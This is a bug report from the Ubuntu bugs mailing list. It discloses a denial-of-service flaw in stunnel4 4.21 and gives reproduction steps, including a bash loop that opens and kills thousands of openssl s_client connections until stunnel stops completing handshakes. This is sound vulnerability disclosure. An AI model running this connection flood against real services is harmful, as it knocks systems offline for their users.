[Bug 327222] [NEW] Simple stunnel DOS when opening and closing connections
Roman Fiedler
roman.fiedler at arcsmed.at
Mon Feb 9 15:36:55 UTC 2009
Public bug reported:
Binary package hint: stunnel4
Usually the stunnel4 process main process with lowest IP consumes 100%
of CPU, TCP connections are accepted, but SSL handshake is not started.
The test scenario below will make 10000 tests, but usually the test can
be suspended after 500-1000 tests, stunnel is broken by then.
stunnel4 on hardy x86:
Description: Ubuntu 8.04.2
Release: 8.04
# apt-cache policy stunnel4
stunnel4:
Installed: 3:4.21-1
Candidate: 3:4.21-1
Version table:
*** 3:4.21-1 0
500 http://security.ubuntu.com hardy/universe Packages
100 /var/lib/dpkg/status
# stunnel4 -version
stunnel 4.21 on i486-pc-linux-gnu with OpenSSL 0.9.8g 19 Oct 2007
Threading:PTHREAD SSL:ENGINE Sockets:POLL,IPv6 Auth:LIBWRAP
Global options
debug = 5
pid = /var/run/stunnel4.pid
RNDbytes = 64
RNDfile = /dev/urandom
RNDoverwrite = yes
Service-level options
cert = /etc/stunnel/stunnel.pem
ciphers = AES:ALL:!aNULL:!eNULL:+RC4:@STRENGTH
key = /etc/stunnel/stunnel.pem
session = 300 seconds
sslVersion = SSLv3 for client, all for server
TIMEOUTbusy = 300 seconds
TIMEOUTclose = 60 seconds
TIMEOUTconnect = 10 seconds
TIMEOUTidle = 43200 seconds
verify = none
Test Scenario:
* Generate keys:
openssl req -new -newkey rsa:1024 -nodes -keyout server.key -days 3653 -x509 -out server.cert -subj "/CN=server"
openssl req -new -newkey rsa:1024 -nodes -keyout client.key -days 3653 -x509 -out client.cert -subj "/CN=client"
* Create config:
service = test tunnel
foreground = yes
# Debug warnings only
debug = 4
pid = /home/[username]/tmp/tunnel/tunnel.pid
cert = server.cert
key = server.key
verify = 3
[testany]
accept = 1234
exec = /home/[username]/tmp/tunnel/testcmd.sh
execargs = testcmd.sh
CAfile = client.cert
* Create testcmd.sh script:
#!/bin/bash
cat >> /tmp/dump
* Start tunnel in one shell
stunnel4 tunnel.cfg
* Start testscript in other:
#!/bin/bash
procCount=0
while [ "${procCount}" != "10000" ] ; do
openssl s_client -key client.key -cert client.cert -connect localhost:1234 < /dev/null > /dev/null 2>&1 &
let procCount=procCount+1
if [ "${procCount#*00}" = "" ] ; then
echo "Test: ${procCount}"
fi
done
pkill -KILL -f "openssl s_client"
* When dead:
openssl s_client -key client.key -cert client.cert -connect localhost:1234
CONNECTED(00000003)
But no handshake
** Affects: stunnel4 (Ubuntu)
Importance: Undecided
Status: New
--
Simple stunnel DOS when opening and closing connections
https://bugs.launchpad.net/bugs/327222
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
--
ubuntu-bugs mailing list
ubuntu-bugs at lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
More information about the universe-bugs
mailing list